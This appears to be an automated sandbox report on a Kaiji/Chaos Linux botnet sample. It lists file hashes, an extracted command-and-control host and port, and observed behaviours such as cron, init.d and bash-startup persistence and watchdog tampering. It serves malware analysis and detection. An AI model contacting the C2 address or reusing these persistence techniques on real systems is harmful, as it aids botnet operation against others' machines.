General

  • Target

    3bd7660e77cbac4a9c8e0d85c03fe144ff34177087dc739e2b66a1293653aeb0.elf

  • Size

    5.1MB

  • Sample

    241109-ypwzla1dnd

  • MD5

    8bd999abd9893c4be18600f481b04ad3

  • SHA1

    10080f79cd6bed96cb3c35e896443c37460b10bf

  • SHA256

    3bd7660e77cbac4a9c8e0d85c03fe144ff34177087dc739e2b66a1293653aeb0

  • SHA512

    81601a5cfa807f87628bc75aa16c7d9a4d052961e33e0423bffd520063fcb399f79ba6594715704e2dc8926989fd1293a5842c8cd08a60f4fed55fb88e519c09

  • SSDEEP

    98304:8cSBHdgN2a7JP97kJru8cYWPAXqDu+60:8cS03Lu+6

Malware Config

Extracted

Family

kaiji

C2

78789.dns.army:7850

Targets

    • Target

      3bd7660e77cbac4a9c8e0d85c03fe144ff34177087dc739e2b66a1293653aeb0.elf

    • Size

      5.1MB

    • MD5

      8bd999abd9893c4be18600f481b04ad3

    • SHA1

      10080f79cd6bed96cb3c35e896443c37460b10bf

    • SHA256

      3bd7660e77cbac4a9c8e0d85c03fe144ff34177087dc739e2b66a1293653aeb0

    • SHA512

      81601a5cfa807f87628bc75aa16c7d9a4d052961e33e0423bffd520063fcb399f79ba6594715704e2dc8926989fd1293a5842c8cd08a60f4fed55fb88e519c09

    • SSDEEP

      98304:8cSBHdgN2a7JP97kJru8cYWPAXqDu+60:8cS03Lu+6

    • Kaiji

      Kaiji payload

    • Kaiji family

    • kaiji_chaosbot

      Chaos-variant payload

    • Executes dropped EXE

    • Modifies Watchdog functionality

      Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    • Creates/modifies environment variables

      Creating/modifying environment variables is a common persistence mechanism.

    • Enumerates running processes

      Discovers information about currently running processes on the system

    • Modifies init.d

      Adds/modifies system service, likely for persistence.

    • Write file to user bin folder

    • Modifies Bash startup script

MITRE ATT&CK Enterprise v15

Tasks